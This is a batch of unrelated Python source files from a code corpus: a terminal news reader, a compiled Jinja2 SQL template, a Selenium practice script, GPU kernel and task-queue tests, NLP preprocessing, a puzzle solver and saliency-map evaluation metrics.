                    self.show_published_time,
                    self.show_score,
                    self.show_comments))
                item_ids.append(story.id)

        if self.already_build:
            self.walker[:] = items
            self.update()
        else:
            self.walker = urwid.SimpleListWalker(items)
            self.listbox = urwid.ListBox(self.walker)

    def show_comments(self, story):
        # NOTE(review): stub, and shadowed by the bool attribute set in
        # __init__ — currently unreachable as a method.
        pass

    def open_webbrowser(self, url):
        """ Handle url and open sub process with web browser """
        if self.config.parser.get('settings', 'browser_cmd') == "__default__":
            python_bin = sys.executable
            subprocess.Popen(
                [python_bin, '-m', 'webbrowser', '-t', url],
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE)
        else:
            cmd = self.config.parser.get('settings', 'browser_cmd')
            try:
                p = subprocess.Popen(
                    cmd.replace('__url__', url),
                    shell=True,
                    close_fds=True,
                    stderr=subprocess.PIPE)
                returncode = p.wait()
            except KeyboardInterrupt:
                stderr = "User keyboard interrupt detected!"
                self.set_footer(stderr, style="error")
                return
            if returncode > 0:
                stderr = p.communicate()[1]
                self.set_footer("%s" % stderr, style="error")

    def update(self):
        """ Update footer about focus story """
        focus = self.listbox.get_focus()[0]
        if not focus.submitter:
            msg = "submitted %s" % focus.published_time
        else:
            msg = "submitted %s by %s" % (
                focus.published_time, focus.submitter)
        self.set_footer(msg)

    def reload_config(self):
        """
        Create new Config object, reload colors, refresh cache
        if needed and redraw screen.
        """
        self.set_footer('Reloading configuration')
        self.config = Config()
        self.build_help()
        self.palette = self.config.get_palette()
        self.build_interface()
        self.loop.draw_screen()
        self.set_footer('Configuration file reloaded!')
        # Pick up a changed cache path without restarting.
        if self.config.parser.get(
                'settings', 'cache') != self.cache_manager.cache_path:
            self.cache_manager.cache_path = self.config.parser.get(
                'settings', 'cache')

    def exit(self, must_raise=False):
        # Stop the poller thread before tearing down the urwid loop.
        self.poller.is_running = False
        self.poller.join()
        if must_raise:
            raise urwid.ExitMainLoop()
        urwid.ExitMainLoop()

    def run(self):
        urwid.connect_signal(self.walker, 'modified', self.update)

        try:
            self.poller.start()
            self.loop.run()
        except KeyboardInterrupt:
            self.exit()
        print('Exiting... Bye!')
|
StarcoderdataPython
|
1789433
|
<filename>sql_gen/test/playground/rewire_verb_compiled.py
def root(context, missing=missing, environment=environment):
    """Jinja2-compiled render function for rewire_verb.sql.

    Machine-generated by the Jinja2 compiler (do not edit by hand):
    ``missing`` and ``environment`` are bound from the compiler's runtime
    namespace; ``l_0_*`` locals mirror template variables; yielded strings
    are the rendered output.
    """
    resolve = context.resolve_or_missing
    undefined = environment.undefined
    # Dead branch that makes the function a generator even if nothing yields.
    if 0:
        yield None
    l_0_adquery = resolve("adquery")
    l_0_entity_def_id = resolve("entity_def_id")
    l_0_prj_prefix = resolve("prj_prefix")
    l_0_verb_name = resolve("verb_name")
    l_0_entity_ids = l_0_process_descriptor_id = l_0_process_descriptor_ref_id = missing
    t_1 = environment.filters["suggest"]
    pass
    # {% set entity_ids = adquery(...) %}
    l_0_entity_ids = context.call(
        (undefined(name="adquery") if l_0_adquery is missing else l_0_adquery),
        "SELECT KEYNAME FROM CCADMIN_IDMAP WHERE KEYSET ='ED'",
    )
    context.vars["entity_ids"] = l_0_entity_ids
    context.exported_vars.add("entity_ids")
    # {{ entity_def_id | suggest(entity_ids) }}
    yield to_string(
        t_1(
            (
                undefined(name="entity_def_id")
                if l_0_entity_def_id is missing
                else l_0_entity_def_id
            ),
            (
                undefined(name="entity_ids")
                if l_0_entity_ids is missing
                else l_0_entity_ids
            ),
        )
    )
    yield "\n"
    # {% set process_descriptor_id = prj_prefix() ~ entity_def_id.capitalize() ~ verb_name.capitalize() %}
    l_0_process_descriptor_id = (
        context.call(
            (
                undefined(name="prj_prefix")
                if l_0_prj_prefix is missing
                else l_0_prj_prefix
            )
        )
        + context.call(
            environment.getattr(
                (
                    undefined(name="entity_def_id")
                    if l_0_entity_def_id is missing
                    else l_0_entity_def_id
                ),
                "capitalize",
            )
        )
    ) + context.call(
        environment.getattr(
            (
                undefined(name="verb_name")
                if l_0_verb_name is missing
                else l_0_verb_name
            ),
            "capitalize",
        )
    )
    context.vars["process_descriptor_id"] = l_0_process_descriptor_id
    context.exported_vars.add("process_descriptor_id")
    # {% include "add_process_descriptor.sql" %}
    template = environment.get_template("add_process_descriptor.sql", "rewire_verb.sql")
    for event in template.root_render_func(
        template.new_context(
            context.get_all(),
            True,
            {
                "process_descriptor_id": l_0_process_descriptor_id,
                "process_descriptor_ref_id": l_0_process_descriptor_ref_id,
                "entity_ids": l_0_entity_ids,
            },
        )
    ):
        yield event
    # {% set process_descriptor_ref_id = process_descriptor_id %}
    l_0_process_descriptor_ref_id = (
        undefined(name="process_descriptor_id")
        if l_0_process_descriptor_id is missing
        else l_0_process_descriptor_id
    )
    context.vars["process_descriptor_ref_id"] = l_0_process_descriptor_ref_id
    context.exported_vars.add("process_descriptor_ref_id")
    # {% include "add_process_descriptor_ref.sql" %}
    template = environment.get_template(
        "add_process_descriptor_ref.sql", "rewire_verb.sql"
    )
    for event in template.root_render_func(
        template.new_context(
            context.get_all(),
            True,
            {
                "process_descriptor_id": l_0_process_descriptor_id,
                "process_descriptor_ref_id": l_0_process_descriptor_ref_id,
                "entity_ids": l_0_entity_ids,
            },
        )
    ):
        yield event
    # Final UPDATE statement with the three interpolated template variables.
    yield "\n\nUPDATE EVA_VERB \nSET (PROCESS_DESC_REF_ID) = (@PDR.%s)\nWHERE ENTITY_DEF_ID = @ED.%s AND NAME ='%s';" % (
        (
            undefined(name="process_descriptor_ref_id")
            if l_0_process_descriptor_ref_id is missing
            else l_0_process_descriptor_ref_id
        ),
        (
            undefined(name="entity_def_id")
            if l_0_entity_def_id is missing
            else l_0_entity_def_id
        ),
        (undefined(name="verb_name") if l_0_verb_name is missing else l_0_verb_name),
    )
StarcoderdataPython
|
3322422
|
from selenium import webdriver
import time
import math
def calc(xx):
    """Return ln(|12 * sin(int(xx))|) as a string (site's challenge formula)."""
    scaled_sine = 12 * math.sin(int(xx))
    return str(math.log(abs(scaled_sine)))
# Automates the suninjuly alert_accept challenge: accept the alert, read x,
# compute the formula, submit the answer.
browser = webdriver.Chrome()
try:
    link = "http://suninjuly.github.io/alert_accept.html"
    browser.get(link)
    button = browser.find_element_by_css_selector("button.btn")
    button.click()
    # Switch focus to the alert window
    alert = browser.switch_to.alert
    # Accept the alert (click OK)
    alert.accept()
    # Read the value for variable x
    x_element = browser.find_element_by_id("input_value")
    x = x_element.text
    # Compute the mathematical function of x
    y = calc(x)
    # Enter the answer into the text field
    input1 = browser.find_element_by_id("answer")
    input1.send_keys(y)
    # Click the Submit button
    button = browser.find_element_by_css_selector("button.btn")
    button.click()
finally:
    # Leave the result page visible for a moment, then always close the browser.
    time.sleep(10)
    browser.quit()
|
StarcoderdataPython
|
31800
|
<gh_stars>1-10
import cupy as cp
import numpy as np
import pandas as pd
import itertools
import math
import networkx as nx
from gpucsl.pc.kernel_management import get_module
# CUDA device functions under test (templated on <n, max_degree>).
function_names = [
    "compact<6,6>",
]
# Compile the helper .cu file; -D PYTHON_TEST presumably exposes the
# test-only entry points — confirm in graph_helpers.cu.
module = get_module("helpers/graph_helpers.cu", function_names, ("-D", "PYTHON_TEST"))
def test_compact_on_random_skeleton():
    """Compact a fixed 6x6 adjacency matrix and compare against the
    hand-computed CSR-like layout (row = [degree, neighbor indices...]).
    """
    kernel = module.get_function("compact<6,6>")
    d_skeleton = cp.array(
        [
            [0, 1, 1, 0, 0, 1],
            [1, 0, 1, 0, 1, 0],
            [0, 0, 0, 0, 0, 0],
            [1, 1, 1, 0, 1, 1],
            [1, 0, 1, 0, 0, 1],
            [0, 1, 1, 1, 0, 0],
        ],
        np.uint16,
    )
    expected_result = np.array(
        [
            [3, 1, 2, 5, 0, 0],
            [3, 0, 2, 4, 0, 0],
            [0, 0, 0, 0, 0, 0],
            [5, 0, 1, 2, 4, 5],
            [3, 0, 2, 5, 0, 0],
            [3, 1, 2, 3, 0, 0],
        ],
        np.uint32,
    )
    d_compacted_skeleton = cp.zeros((6, 6), np.uint32)

    kernel((1,), (6,), (d_skeleton, d_compacted_skeleton, 0, 6))

    # Exact integer comparison on the host, consistent with the sibling
    # fully-connected test.  The original used cp.isclose(...).all(), which
    # is a float tolerance check on integer data and mixed a host array
    # with a device array.
    assert cp.array_equal(expected_result, d_compacted_skeleton.get())
def test_compact_on_fully_connected_skeleton():
    """Compact a fully connected 6x6 skeleton.

    Every row of the expected output starts with the node degree (5)
    followed by the indices of all other nodes, so it can be generated
    programmatically instead of spelled out literally.
    """
    kernel = module.get_function("compact<6,6>")
    adjacency = cp.ones((6, 6), np.uint16)
    expected_result = np.array(
        [[5] + [j for j in range(6) if j != i] for i in range(6)],
        np.uint32,
    )
    compacted = cp.zeros((6, 6), np.uint32)

    kernel((1,), (6,), (adjacency, compacted, 0, 6))

    assert cp.array_equal(expected_result, compacted.get())
def test_compact_on_random_big_skeleton():
    # NOTE(review): smoke/profiling run only — there is no assertion.
    # NOTE(review): the kernel is templated "compact<6,6>" and the output
    # buffer is (6, 6), yet the input skeleton is size x size with
    # size=5000 — this looks like an out-of-bounds write / template
    # mismatch; verify against the kernel's template parameters.
    kernel = module.get_function("compact<6,6>")
    size = 5000
    # Random 0/1 adjacency matrix on the device.
    d_skeleton = cp.random.choice([0, 1], size=(size, size)).astype(np.uint16)
    d_compacted_skeleton = cp.zeros((6, 6), np.uint32)
    # Debug prints of the launch configuration (left in by the author).
    print((math.ceil(size / 512),))
    print((min(512, size),))
    cp.cuda.profiler.start()
    kernel(
        (math.ceil(size / 512),),
        (min(512, size),),
        (d_skeleton, d_compacted_skeleton, 0, size),
    )
    cp.cuda.profiler.stop()
|
StarcoderdataPython
|
3209225
|
import asyncio
import time as ttime
from bluesky_queueserver.manager.task_results import TaskResults
def test_TaskResults_update_uid():
    """
    TaskResults: Test that task result UID is updated.
    """

    async def testing():
        tr = TaskResults()
        uid = tr.task_results_uid
        assert isinstance(uid, str)
        # Calling the private updater must produce a fresh UID.
        tr._update_task_results_uid()
        assert tr.task_results_uid != uid

    asyncio.run(testing())
def test_TaskResults_add_running_task():
    """
    TaskResults: tests for ``add_running_task``, ``clear_running_task``
    """

    async def testing():
        tr = TaskResults()
        assert tr._running_tasks == {}
        uid = tr.task_results_uid

        # One task with the default (empty) payload, one with data.
        await tr.add_running_task(task_uid="abc")
        await tr.add_running_task(task_uid="def", payload={"some_value": 10})
        assert len(tr._running_tasks) == 2
        assert tr._running_tasks["abc"]["payload"] == {}
        assert isinstance(tr._running_tasks["abc"]["time"], float)
        assert tr._running_tasks["def"]["payload"] == {"some_value": 10}
        assert isinstance(tr._running_tasks["def"]["time"], float)

        await tr.clear_running_tasks()
        assert tr._running_tasks == {}

        # UID is not expected to change
        assert tr.task_results_uid == uid

    asyncio.run(testing())
def test_TaskResults_remove_running_task():
    """
    TaskResults: tests for ``remove_running_task``
    """

    async def testing():
        tr = TaskResults()
        assert tr._running_tasks == {}
        uid = tr.task_results_uid

        await tr.add_running_task(task_uid="abc")
        await tr.add_running_task(task_uid="def", payload={"some_value": 10})
        assert len(tr._running_tasks) == 2

        # Removing one task must leave the other untouched.
        await tr.remove_running_task(task_uid="abc")
        assert len(tr._running_tasks) == 1
        assert tr._running_tasks["def"]["payload"] == {"some_value": 10}
        assert isinstance(tr._running_tasks["def"]["time"], float)

        # UID is not expected to change
        assert tr.task_results_uid == uid

    asyncio.run(testing())
def test_TaskResults_add_completed_task():
    """
    TaskResults: tests for ``add_running_task``, ``clear_running_task``
    """

    async def testing():
        tr = TaskResults()
        uid1 = tr.task_results_uid

        # Add running tasks. The running tasks should be removed as completed tasks
        # with the same UID are added.
        await tr.add_running_task(task_uid="abc", payload={"some_value": "arbitrary_payload"})
        await tr.add_running_task(task_uid="def", payload={"some_value": "arbitrary_payload"})
        assert tr.task_results_uid == uid1
        assert tr._completed_tasks_time == []
        assert tr._completed_tasks_data == {}
        assert len(tr._running_tasks) == 2

        # Each completion must bump the results UID.
        await tr.add_completed_task(task_uid="abc")
        uid2 = tr.task_results_uid
        await tr.add_completed_task(task_uid="def", payload={"some_value": 10})
        uid3 = tr.task_results_uid
        assert len(tr._completed_tasks_time) == 2
        assert len(tr._completed_tasks_data) == 2
        assert len(tr._running_tasks) == 0
        assert uid1 != uid2
        assert uid2 != uid3

        # Completion payload/time bookkeeping is mirrored between the
        # per-uid data dict and the chronological time list.
        assert tr._completed_tasks_data["abc"]["payload"] == {}
        assert isinstance(tr._completed_tasks_data["abc"]["time"], float)
        assert tr._completed_tasks_time[0]["task_uid"] == "abc"
        assert tr._completed_tasks_time[0]["time"] == tr._completed_tasks_data["abc"]["time"]

        assert tr._completed_tasks_data["def"]["payload"] == {"some_value": 10}
        assert isinstance(tr._completed_tasks_data["def"]["time"], float)
        assert tr._completed_tasks_time[1]["task_uid"] == "def"
        assert tr._completed_tasks_time[1]["time"] == tr._completed_tasks_data["def"]["time"]

        await tr.clear()
        assert tr._completed_tasks_time == []
        assert tr._completed_tasks_data == {}

        # UID is not expected to change
        assert tr.task_results_uid == uid3

    asyncio.run(testing())
def test_TaskResults_clear():
    """
    TaskResults: tests for ``clear``
    """

    async def testing():
        tr = TaskResults()
        await tr.add_running_task(task_uid="abc", payload={"some_value": "arbitrary_payload"})
        await tr.add_running_task(task_uid="def", payload={"some_value": "arbitrary_payload"})
        # Completing "abc" moves it out of the running set.
        await tr.add_completed_task(task_uid="abc")
        assert len(tr._completed_tasks_time) == 1
        assert len(tr._completed_tasks_data) == 1
        assert len(tr._running_tasks) == 1

        uid = tr.task_results_uid
        # clear() must wipe both running and completed collections.
        await tr.clear()
        assert tr._running_tasks == {}
        assert tr._completed_tasks_time == []
        assert tr._completed_tasks_data == {}

        # UID is not expected to change
        assert tr.task_results_uid == uid

    asyncio.run(testing())
def test_TaskResults_clean_completed_tasks_1():
    """
    TaskResults: tests for ``clean_completed_tasks``.
    """

    async def testing():
        tr = TaskResults(retention_time=1)  # Intentionally set short retention time
        await tr.add_completed_task(task_uid="abc")
        assert len(tr._completed_tasks_data) == 1
        assert len(tr._completed_tasks_time) == 1
        await tr.clean_completed_tasks()  # No effect
        assert len(tr._completed_tasks_data) == 1
        assert len(tr._completed_tasks_time) == 1
        ttime.sleep(0.8)
        # 'add_completed_task' is expected to 'clean' the task list,
        # but there are no expired tasks yet.
        await tr.add_completed_task(task_uid="def", payload={"some_value": 10})
        assert len(tr._completed_tasks_data) == 2
        assert len(tr._completed_tasks_time) == 2
        ttime.sleep(0.5)
        await tr.clean_completed_tasks()  # Should remove the 1st task
        assert len(tr._completed_tasks_data) == 1
        assert len(tr._completed_tasks_time) == 1
        ttime.sleep(0.8)
        await tr.clean_completed_tasks()  # Should remove the 2nd task
        assert len(tr._completed_tasks_data) == 0
        assert len(tr._completed_tasks_time) == 0

    asyncio.run(testing())
def test_TaskResults_clean_completed_tasks_2():
    """
    TaskResults: tests that ``clean_completed_tasks`` is implicitly called
    when a completed task is added.
    """

    async def testing():
        tr = TaskResults(retention_time=1)  # Intentionally set short retention time
        await tr.add_completed_task(task_uid="abc")
        assert len(tr._completed_tasks_data) == 1
        assert len(tr._completed_tasks_time) == 1
        ttime.sleep(1.5)
        # Adds the 2nd task, but removes the 1st (because it is expired)
        await tr.add_completed_task(task_uid="def", payload={"some_value": 10})
        assert len(tr._completed_tasks_data) == 1
        assert len(tr._completed_tasks_time) == 1
        assert tr._completed_tasks_time[0]["task_uid"] == "def"
        assert list(tr._completed_tasks_data.keys())[0] == "def"

    asyncio.run(testing())
def test_TaskResults_get_task_info():
    """
    TaskResults: tests for ``get_task_info``.
    """

    async def testing():
        tr = TaskResults(retention_time=1)  # Intentionally set short retention time
        await tr.add_running_task(task_uid="abc", payload={"some_value": 5})
        await tr.add_running_task(task_uid="def", payload={"some_value": 10})
        await tr.add_completed_task(task_uid="def", payload={"some_value": 20})
        # A running task reports its original payload.
        status, payload = await tr.get_task_info(task_uid="abc")
        assert status == "running"
        assert payload == {"some_value": 5}
        # A completed task reports the completion payload.
        status, payload = await tr.get_task_info(task_uid="def")
        assert status == "completed"
        assert payload == {"some_value": 20}
        # Unknown UID.
        status, payload = await tr.get_task_info(task_uid="gih")
        assert status == "not_found"
        assert payload == {}

    asyncio.run(testing())
|
StarcoderdataPython
|
4821329
|
<gh_stars>0
import numpy as np
from datasets import load_dataset
from itertools import chain
from gensim.models import KeyedVectors
import pickle
def preprocess_conll_data(dataset, embedding_model, dimensions):
    """
    Convert a CoNLL dataset to embedding vectors and target POS tags.

    :param dataset: mapping with 'tokens' and 'pos_tags' lists of per-sentence lists
    :param embedding_model: mapping from token to embedding vector
    :param dimensions: dimensionality of the embeddings (used for OOV zero vectors)
    :return: tuple (list of embedding vectors, flat list of POS tags)
    """
    # Flatten the per-sentence lists into single token/tag lists.
    tokens = list(chain.from_iterable(dataset['tokens']))
    pos_tags = list(chain.from_iterable(dataset['pos_tags']))
    inputs_list = []
    for token in tokens:
        if token in embedding_model:
            vector = embedding_model[token]
        else:
            # Out-of-vocabulary token: fall back to a zero-filled vector.
            vector = [0] * dimensions
        inputs_list.append(vector)
    return inputs_list, pos_tags
def create_output_values(targets, output_nodes, activation_function):
    """
    Encode target labels as one-hot-like output vectors.

    :param targets: iterable of integer class labels
    :param output_nodes: length of each output vector
    :param activation_function: 'sigmoid' (background 0.01) or 'tanh'
        (background -0.99); the target index is always set to 0.99
    :return: list of numpy arrays, one per target
    :raises ValueError: if ``activation_function`` is not supported
    """
    if activation_function not in ('sigmoid', 'tanh'):
        # Previously an unsupported name left target_value unbound (NameError).
        raise ValueError("Unsupported activation function: %r" % (activation_function,))
    targets_output_list = []
    for target in targets:
        if activation_function == 'sigmoid':
            # Background values just above 0 for a sigmoid output layer.
            target_value = np.zeros(output_nodes) + 0.01
        else:  # 'tanh'
            # Background values just above -1 for a tanh output layer.
            target_value = np.zeros(output_nodes) - 0.99
        # The target label index gets the highest value.
        target_value[target] = 0.99
        targets_output_list.append(target_value)
    return targets_output_list
def main():
    """Preprocess the Dutch CoNLL-2002 splits into pickled inputs/targets."""
    output_nodes = 12  # number of output classes (POS tags)

    def _dump(obj, path):
        # Write a pickle and close the handle (the originals leaked open files).
        with open(path, 'wb') as fh:
            pickle.dump(obj, fh)

    # PREPROCESS TRAINING DATA
    # Embedding model trained on the COW corpus,
    # SOURCE: https://github.com/clips/dutchembeddings
    embedding_model = KeyedVectors.load_word2vec_format("data/cow-embeddings-320/cow-big.txt", binary=False)
    train_dataset = load_dataset("conll2002", "nl", split='train')
    inputs_list, targets_list = preprocess_conll_data(train_dataset, embedding_model, 320)
    _dump(inputs_list, './data/conll2002/train_inputs.txt')
    # Output encodings for a sigmoid activation function.
    targets_output_list = create_output_values(targets_list, output_nodes, 'sigmoid')
    _dump(targets_output_list, './data/conll2002/train_targets_output.txt')
    # Output encodings for a tanh activation function.
    targets_output_list = create_output_values(targets_list, output_nodes, 'tanh')
    _dump(targets_output_list, './data/conll2002/train_targets_tanh_output.txt')

    # PREPROCESS VALIDATION DATA
    validation_dataset = load_dataset("conll2002", "nl", split='validation')
    inputs_list, targets_list = preprocess_conll_data(validation_dataset, embedding_model, 320)
    _dump(inputs_list, './data/conll2002/validation_inputs.txt')
    _dump(targets_list, './data/conll2002/validation_targets.txt')

    # PREPROCESS TEST DATA
    test_dataset = load_dataset("conll2002", "nl", split='test')
    inputs_list, targets_list = preprocess_conll_data(test_dataset, embedding_model, 320)
    _dump(inputs_list, './data/conll2002/test_inputs.txt')
    _dump(targets_list, './data/conll2002/test_targets.txt')


if __name__ == "__main__":
    main()
|
StarcoderdataPython
|
28777
|
from itertools import product
from tools.general import load_input_list
def get_new_active_range(current_active_set, dimensions):
    """Return per-dimension ranges covering all active points plus a 1-cell border.

    Note: bounds are initialised to 0, so every returned range includes the
    origin regardless of where the active points lie (matches the puzzle's
    seeding of the initial grid around 0).
    """
    lowest = [0] * dimensions
    highest = [0] * dimensions
    for point in current_active_set:
        for axis, coord in enumerate(point):
            if coord < lowest[axis]:
                lowest[axis] = coord
            elif highest[axis] < coord:
                highest[axis] = coord
    # Pad by one cell on each side so inactive neighbours can become active.
    return tuple(range(lowest[i] - 1, highest[i] + 2) for i in range(dimensions))
def count_active_neighbours(active_set, point):
    """Count active cells among the (3**d - 1) neighbours of ``point``."""
    active_count = 0
    for nbr in product(*(range(coord - 1, coord + 2) for coord in point)):
        # The cartesian product includes the point itself; exclude it.
        if nbr in active_set and nbr != point:
            active_count += 1
    return active_count
def new_state_is_active(active_set, point):
    """Apply the Conway-cubes rules to one cell.

    An active cell stays active with 2 or 3 active neighbours; an inactive
    cell becomes active with exactly 3 active neighbours.
    """
    active_nbr = count_active_neighbours(active_set, point)
    if point in active_set:
        if 2 <= active_nbr <= 3:
            return True
    elif active_nbr == 3:
        return True
    return False
def iterate_grid(initial_grid, dimensions, iterations):
    """Run the Conway-cubes automaton and return the final active-cell count.

    :param initial_grid: 2-D list of '#'/'.' characters (the seed plane)
    :param dimensions: dimensionality of the space (e.g. 3 or 4)
    :param iterations: number of automaton steps to run
    """
    active_points = set()
    # Seed the active set from the 2-D slice, padding extra dims with 0.
    for y, row in enumerate(initial_grid):
        for x, cube in enumerate(row):
            if cube == '#':
                active_points.add(tuple([x, y] + [0] * (dimensions - 2)))
    for _ in range(iterations):
        new_active_points = set()
        for point in product(*get_new_active_range(active_points, dimensions)):
            if new_state_is_active(active_points, point):
                new_active_points.add(point)
        active_points = new_active_points
    return len(active_points)
starting_grid = [list(row) for row in load_input_list("day17.txt")]
print(f"Part 1 => {iterate_grid(starting_grid, 3, 6)}")
# Fixed label: the 4-D run is part 2 (was mislabelled "Part 1").
print(f"Part 2 => {iterate_grid(starting_grid, 4, 6)}")
|
StarcoderdataPython
|
155610
|
<reponame>rajeevyasarla/3SD<filename>compute_and_plot.py
import os
import torch
from sklearn.metrics import f1_score, precision_score, recall_score
'''from sklearn.metrics import (precision_recall_curve, PrecisionRecallDisplay)
from sklearn.metrics import precision_recall_curve'''
import cv2
import pdb
import numpy as np
import torch.nn.functional as F
from torch.autograd import Variable
import matplotlib.pyplot as plt
import matplotlib as mpl
import glob
def Sobel_op(img):
    """Soft edge map: Sobel gradient magnitude, tanh-squashed, box-dilated.

    :param img: float tensor of shape (N, 1, H, W)
    :return: tensor of shape (N, 1, H, W), values clamped to [0, 1]
    """
    # 3x3 Sobel kernels for horizontal and vertical gradients.
    kernel_x = np.array([[1, 0, -1], [2, 0, -2], [1, 0, -1]], dtype=np.float32)
    kernel_x_tensor = torch.from_numpy(kernel_x).view(1, 1, 3, 3)
    kernel_y = np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]], dtype=np.float32)
    kernel_y_tensor = torch.from_numpy(kernel_y).view(1, 1, 3, 3)
    Gx = torch.nn.functional.conv2d(img, kernel_x_tensor, padding=(1, 1))
    Gy = torch.nn.functional.conv2d(img, kernel_y_tensor, padding=(1, 1))
    # Gradient magnitude, squashed to (0, 1). torch.tanh replaces the
    # deprecated torch.nn.functional.tanh; the Variable wrapper (a no-op
    # since PyTorch 0.4) was dropped.
    G = torch.tanh(torch.sqrt(Gx * Gx + Gy * Gy))
    # Dilate with a 3x3 mean filter and clamp back into [0, 1].
    kernel = np.full((3, 3), 1.0 / 9.0, dtype=np.float32)
    kernel_tensor = torch.from_numpy(kernel).view(1, 1, 3, 3)
    dilated_G = torch.clamp(torch.nn.functional.conv2d(G, kernel_tensor, padding=(1, 1)), 0, 1)
    return dilated_G
def B_measure(gt, target):
    """Boundary measure: 1 - Dice-style overlap of the Sobel edge maps.

    :param gt: 2-D numpy array (ground-truth saliency map)
    :param target: 2-D numpy array (predicted saliency map), same shape
    :return: 0-dim torch tensor; lower means better boundary agreement
    """
    h, w = gt.shape
    gt = torch.from_numpy(gt.astype(np.float32))
    target = torch.from_numpy(target.astype(np.float32))
    G_gt = Sobel_op(gt.view(1, 1, h, w))
    G_target = Sobel_op(target.view(1, 1, h, w))
    B = 1 - (2 * (torch.sum(G_gt * G_target)) /
             (torch.sum(G_target * G_target) + torch.sum(G_gt * G_gt)))
    return B
def E_measure(gt, target):
    """Enhanced-alignment measure between two binary maps (numpy arrays).

    :param gt: ground-truth binary map
    :param target: predicted binary map, same shape
    :return: scalar mean of the enhanced alignment matrix
    """
    # Mean-centre both maps. (Removed the no-op self-assignments gt=gt etc.)
    phi_gt = gt - gt.mean()
    phi_target = target - target.mean()
    # NOTE(review): divides by zero where both centred maps are 0 at the same
    # pixel; the original code had the same behaviour — confirm inputs always
    # avoid this before hardening.
    phi = (2 * phi_gt * phi_target) / (phi_gt * phi_gt + phi_target * phi_target)
    enhanced_phi = 0.25 * (1 + phi) ** 2
    return enhanced_phi.mean()
def files(path):
    """Yield names of regular files (not directories) directly under ``path``."""
    for entry in os.listdir(path):
        if os.path.isfile(os.path.join(path, entry)):
            yield entry
def object_s(pred, gt):
    """Object-level similarity of ``pred`` inside the region where ``gt == 1``.

    :param pred: prediction tensor
    :param gt: binary mask tensor, same shape
    :return: 0-dim tensor score
    """
    fg_values = pred[gt == 1]
    mean = fg_values.mean()
    sigma = fg_values.std()
    # 2x / (x^2 + 1 + sigma); the epsilon guards against division by zero.
    return 2.0 * mean / (mean * mean + 1.0 + sigma + 1e-20)
def S_object(pred, gt):
    """Object-aware component of the S-measure.

    Scores foreground and background separately and mixes them by the
    foreground proportion of ``gt``.
    """
    # Prediction restricted to the foreground (zeros elsewhere).
    fg = torch.where(gt == 0, torch.zeros_like(pred), pred)
    # Inverted prediction restricted to the background.
    bg = torch.where(gt == 1, torch.zeros_like(pred), 1 - pred)
    o_fg = object_s(fg, gt)
    o_bg = object_s(bg, 1 - gt)
    u = gt.mean()  # foreground fraction
    Q = u * o_fg + (1 - u) * o_bg
    return Q
def centroid(gt):
    """Return the (X, Y) centroid of a binary mask as long tensors.

    Falls back to the geometric centre of the image when the mask is empty.
    """
    rows, cols = gt.size()[-2:]
    gt = gt.view(rows, cols)
    cuda = False  # NOTE(review): hard-coded, so the CUDA branches are never taken.
    if gt.sum() == 0:
        # Empty mask: use the image centre.
        if cuda:
            X = torch.eye(1).cuda() * round(cols / 2)
            Y = torch.eye(1).cuda() * round(rows / 2)
        else:
            X = torch.eye(1) * round(cols / 2)
            Y = torch.eye(1) * round(rows / 2)
    else:
        total = gt.sum()
        if cuda:
            i = torch.from_numpy(np.arange(0, cols)).cuda().float()
            j = torch.from_numpy(np.arange(0, rows)).cuda().float()
        else:
            i = torch.from_numpy(np.arange(0, cols)).float()
            j = torch.from_numpy(np.arange(0, rows)).float()
        # Mass-weighted mean of the column (X) and row (Y) indices.
        X = torch.round((gt.sum(dim=0) * i).sum() / total + 1e-20)
        Y = torch.round((gt.sum(dim=1) * j).sum() / total + 1e-20)
    return X.long(), Y.long()
def divideGT(gt, X, Y):
    """Split ``gt`` into four quadrants at (X, Y) and return area weights.

    :param gt: tensor whose last two dims are (h, w)
    :param X: column split index (0-dim long tensor)
    :param Y: row split index (0-dim long tensor)
    :return: (LT, RT, LB, RB, w1, w2, w3, w4) — quadrants and their
        fractions of the total area
    """
    h, w = gt.size()[-2:]
    area = h * w
    gt = gt.view(h, w)
    LT = gt[:Y, :X]
    RT = gt[:Y, X:w]
    LB = gt[Y:h, :X]
    RB = gt[Y:h, X:w]
    X = X.float()
    Y = Y.float()
    w1 = X * Y / area
    w2 = (w - X) * Y / area
    w3 = X * (h - Y) / area
    w4 = 1 - w1 - w2 - w3  # remainder, so the four weights sum to 1
    return LT, RT, LB, RB, w1, w2, w3, w4
def dividePrediction(pred, X, Y):
    """Split ``pred`` into four quadrants at (X, Y) (no weights, unlike divideGT)."""
    h, w = pred.size()[-2:]
    pred = pred.view(h, w)
    LT = pred[:Y, :X]
    RT = pred[:Y, X:w]
    LB = pred[Y:h, :X]
    RB = pred[Y:h, X:w]
    return LT, RT, LB, RB
def ssim(pred, gt):
    """Single-window SSIM between a prediction and ground-truth tensor."""
    gt = gt.float()
    h, w = pred.size()[-2:]
    N = h * w
    x = pred.mean()
    y = gt.mean()
    # Unbiased (N-1) variances/covariance with an epsilon guard.
    sigma_x2 = ((pred - x) * (pred - x)).sum() / (N - 1 + 1e-20)
    sigma_y2 = ((gt - y) * (gt - y)).sum() / (N - 1 + 1e-20)
    sigma_xy = ((pred - x) * (gt - y)).sum() / (N - 1 + 1e-20)
    alpha = 4 * x * y * sigma_xy  # fixed local name (was 'aplha')
    beta = (x * x + y * y) * (sigma_x2 + sigma_y2)
    if alpha != 0:
        Q = alpha / (beta + 1e-20)
    elif alpha == 0 and beta == 0:
        # Both images constant: treat as a perfect match.
        Q = 1.0
    else:
        Q = 0
    return Q
def S_region(pred, gt):
    """Region-aware component of the S-measure.

    Splits both maps into quadrants at the GT centroid, scores each
    quadrant with SSIM, and combines them weighted by quadrant area.
    """
    X, Y = centroid(gt)
    gt1, gt2, gt3, gt4, w1, w2, w3, w4 = divideGT(gt, X, Y)
    p1, p2, p3, p4 = dividePrediction(pred, X, Y)
    Q1 = ssim(p1, gt1)
    Q2 = ssim(p2, gt2)
    Q3 = ssim(p3, gt3)
    Q4 = ssim(p4, gt4)
    Q = w1 * Q1 + w2 * Q2 + w3 * Q3 + w4 * Q4
    return Q
def S_measure(target, gt):
    """Structure measure: equal-weight mix of object- and region-aware scores.

    :param target: 2-D numpy array (binarised prediction)
    :param gt: 2-D numpy array (binarised ground truth), same shape
    :return: 0-dim torch tensor score
    """
    alpha = 0.5
    h, w = gt.shape
    gt = torch.from_numpy(gt).type(torch.FloatTensor)
    target = torch.from_numpy(target).type(torch.FloatTensor)
    gt = gt.view(1, 1, h, w)
    target = target.view(1, 1, h, w)
